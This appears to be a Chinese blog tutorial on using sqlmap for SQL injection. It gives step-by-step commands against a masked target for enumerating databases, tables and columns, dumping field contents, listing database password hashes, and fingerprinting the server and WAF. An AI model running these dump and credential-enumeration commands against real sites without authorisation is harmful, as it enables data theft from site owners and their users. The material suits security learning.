提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试
一、判断SQL注入点
通过SQL注入点来让我们进一步进行信息收集
利用SQLMap检测是否存在注入点:
(如果没有安装和配置SQLMap可以看一下这一篇文章,https://blog.csdn.net/lzp_5257/article/details/124145686?spm=1001.2014.3001.5502)
Python sqlmap.py -u "http://***.***.com"
引号中换为你的目标地址即可!
二、查询数据库信息
Python sqlmap.py -u "http://***.***.com" --dbs
三、根据数据库查询数据表
Python sqlmap.py -u "http://***.***.com" -D [指定数据库名称] --tables
四、根据数据表查询列信息
Python sqlmap.py -u "http://***.***.com" -D [指定数据库名称] -T [指定表名称] --columns
五、根据字段枚举字段内容
Python sqlmap.py -u "http://***.***.com" -D [指定数据库名称] -T [指定表名称] -C "[字段名称1],[字段名称2]" --dump
六、SQLMap一些其他命令介绍
1、查看数据库相关信息
Python sqlmap.py -u "http://***.***.com" --current-user //枚举当前用户
Python sqlmap.py -u "http://***.***.com" --current-db //枚举当前数据库
Python sqlmap.py -u "http://***.***.com" --is-dba //枚举数据库权限
Python sqlmap.py -u "http://***.***.com" --passwords //枚举数据库用户名密码
Python sqlmap.py -u "http://***.***.com" --passwords //枚举数据库用户名密码
2、指纹识别
Python sqlmap.py -u "http://***.***.com" -f //启动广泛的指纹识别
Python sqlmap.py -u "http://***.***.com" -b //检测数据库指纹
Python sqlmap.py -u "http://***.***.com" --hostname //枚举主机名称
3、Waf识别
Python sqlmap.py -u "http://***.***.com" --identify-waf //检测waf信息
以上为SQLMap常用指令,如果想了解更多参数以及指令可以使用:
Python sqlmap.py -hh
关于更新问题
SQLMap不建议使用指令更新,可一直去Github重新下载替换一下
Python sqlmap.py -update
Github下载地址:
https://github.com/sqlmapproject/sqlmap
OK,先说这一些,开始奔放吧!!!
有任何问题可以私信,看到之后第一时间回复哦!!